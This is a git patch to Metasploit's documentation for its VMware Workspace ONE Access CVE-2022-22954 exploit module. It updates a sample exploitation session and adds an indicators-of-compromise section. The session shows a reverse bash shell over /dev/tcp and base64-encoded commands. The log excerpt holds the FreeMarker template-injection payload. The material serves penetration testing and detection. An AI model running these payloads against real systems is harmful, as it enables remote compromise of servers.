From 4ea72bb7a7b95c668c60cd7c8d94028f0723b691 Mon Sep 17 00:00:00 2001
From: William Vu <4551878+wvu@users.noreply.github.com>
Date: Tue, 3 May 2022 02:19:43 -0500
Subject: [PATCH] Add log IOC

---
 ...ware_workspace_one_access_cve_2022_22954.md | 18 ++++++++++++++----
 1 file changed, 14 insertions(+), 4 deletions(-)

diff --git a/documentation/modules/exploit/linux/http/vmware_workspace_one_access_cve_2022_22954.md b/documentation/modules/exploit/linux/http/vmware_workspace_one_access_cve_2022_22954.md
index 3cacb857bd..eb3315a42d 100644
--- a/documentation/modules/exploit/linux/http/vmware_workspace_one_access_cve_2022_22954.md
+++ b/documentation/modules/exploit/linux/http/vmware_workspace_one_access_cve_2022_22954.md
@@ -66,17 +66,27 @@ msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > set verbos verbose => true msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > run -[+] bash -c '0<&174-;exec 174<>/dev/tcp/192.168.0.4/4444;sh <&174 >&174 2>&174' +[+] bash -c '0<&159-;exec 159<>/dev/tcp/192.168.0.4/4444;sh <&159 >&159 2>&159' [*] Started reverse TCP handler on 127.0.0.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[*] Executing command: bash -c {eval,$({echo,ZWNobyB5dGdJRGVVaVM=}|{base64,-d})} +[*] Executing command: bash -c {eval,$({echo,ZWNobyAzUjNQazhpemd6}|{base64,-d})} [+] The target is vulnerable. [*] Executing cmd/unix/reverse_bash (Unix Command) -[*] Executing command: bash -c {eval,$({echo,YmFzaCAtYyAnMDwmMTM4LTtleGVjIDEzODw+L2Rldi90Y3AvMTkyLjE2OC4wLjQvNDQ0NDtzaCA8JjEzOCA+JjEzOCAyPiYxMzgn}|{base64,-d})} -[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:55079) at 2022-05-02 20:17:23 -0500 +[*] Executing command: bash -c {eval,$({echo,YmFzaCAtYyAnMDwmMTAxLTtleGVjIDEwMTw+L2Rldi90Y3AvMTkyLjE2OC4wLjQvNDQ0NDtzaCA8JjEwMSA+JjEwMSAyPiYxMDEn}|{base64,-d})} +[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:57862) at 2022-05-03 02:33:24 -0500 id uid=1001(horizon) gid=1003(www) groups=1003(www),1001(vfabric),1002(pivotal) uname -a Linux photon-machine 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021 x86_64 GNU/Linux ``` + +## IOCs + +### `/opt/vmware/horizon/workspace/logs/greenbox_web.log` + +``` +[snip] +2022-05-03 07:33:17,988 WARN (Thread-147) [com.vmware.endusercatalog.ui.web.UiApplicationExceptionResolver.resolveException] - Additional error info for requestId fe10fc5e-ff7d-4a5a-96bf-f2e1b20eb63f which resulted in return code 400, mapped to error code auth.context.invalid and, error is: {"code":"auth.context.invalid","message":"Authorization context is not valid. 
Login request received with tenant code: zt1myh6phvlz, device id: null, device type: ${\"freemarker.template.utility.Execute\"?new()(\"bash -c {eval,$({echo,YmFzaCAtYyAnMDwmMTAxLTtleGVjIDEwMTw+L2Rldi90Y3AvMTkyLjE2OC4wLjQvNDQ0NDtzaCA8JjEwMSA+JjEwMSAyPiYxMDEn}|{base64,-d})}\")} and token revoke status: false."}, mapped exception class :class com.vmware.endusercatalog.auth.InvalidAuthContextException +[snip] +```